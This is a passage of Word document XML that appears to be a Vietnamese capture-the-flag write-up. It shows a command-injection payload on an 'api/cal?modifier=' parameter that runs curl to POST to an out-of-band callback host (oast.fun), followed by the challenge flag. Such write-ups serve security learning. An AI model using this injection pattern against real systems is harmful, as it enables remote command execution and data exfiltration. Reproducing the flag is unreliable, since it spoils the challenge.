        <w:t xml:space="preserve"> dữ liệu Json bằng curl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F81DB0" w14:textId="297E29FD" w:rsidR="0044448D" w:rsidRDefault="0044448D" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044448D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>api/ca</w:t>
      </w:r>
      <w:r w:rsidR="00AA4954">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AA4954">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0044448D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l?modifier=5;curl -X POST http://gqapsnoypgrztlcpwfuak4jdcxpogewb7.oast.fun/ -H 'content-type: application/json' -d {"content":"$(echo 'hi')"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3293DEDB" w14:textId="77777777" w:rsidR="00AA4954" w:rsidRDefault="00AA4954" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A89E470" w14:textId="190A3412" w:rsidR="00666457" w:rsidRPr="00AA4954" w:rsidRDefault="00AA4954" w:rsidP="00860B53">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4954">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CACI{1_l0v3_c0mm4nd_1nj3ct10n}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00666457" w:rsidRPr="00AA4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FD"/>
    <w:rsid w:val="00023FB6"/>
    <w:rsid w:val="000F571C"/>
    <w:rsid w:val="001231FD"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0044448D"/>
    <w:rsid w:val="00557D4F"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00666457"/>
    <w:rsid w:val="006C4687"/>
    <w:rsid w:val="006C678E"/>
    <w:rsid w:val="006D6E69"/>
    <w:rsid w:val="00755290"/>
    <w:rsid w:val="00821A9B"/>
    <w:rsid w:val="008606A2"/>
    <w:rsid w:val="00860B53"/>
    <w:rsid w:val="00861658"/>
    <w:rsid w:val="008C5FB5"/>
    <w:rsid w:val="008D0D80"/>
    <w:rsid w:val="009713FD"/>
    <w:rsid w:val="009E088E"/>
    <w:rsid w:val="009F385C"/>
    <w:rsid w:val="00A74116"/>
    <w:rsid w:val="00AA4954"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C75C8C"/>
    <w:rsid w:val="00D91DF4"/>
    <w:rsid w:val="00E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4CE1FF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F66F2EF7-2E30-3742-9AB7-DE89E73F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2024-09-29T14:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-29T15:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>